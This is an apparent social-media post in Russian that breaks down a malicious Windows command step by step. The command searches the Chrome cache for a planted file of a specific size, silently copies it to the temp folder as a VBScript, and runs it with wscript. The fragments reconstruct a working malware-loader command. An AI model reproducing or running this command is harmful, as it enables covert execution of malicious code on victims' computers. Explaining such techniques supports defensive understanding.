Разбор команды по частям:
cmd /c — запускает командную строку Windows для выполнения переданной инструкции.
for /r "%LOCALAPPDATA%\Google\Chrome\User Data" %f in (f_*) — рекурсивно сканирует файлы кэша браузера Chrome (файлы вида f_*).
if %~zf==22592 — ищет файл с точным размером 22 592 байта (заранее загруженный вредоносный объект).
copy "%f" %TEMP%\t.vbs >nul 2>nul — незаметно копирует найденный файл кэша во временную папку под видом VBScript (t.vbs).
wscript %TEMP%\t.vbs — моментально исполняет созданный файл через системный интерпретатор Windows Script Host.
Post #1778
365
Forwarded from Не Ислам
- 🔥 2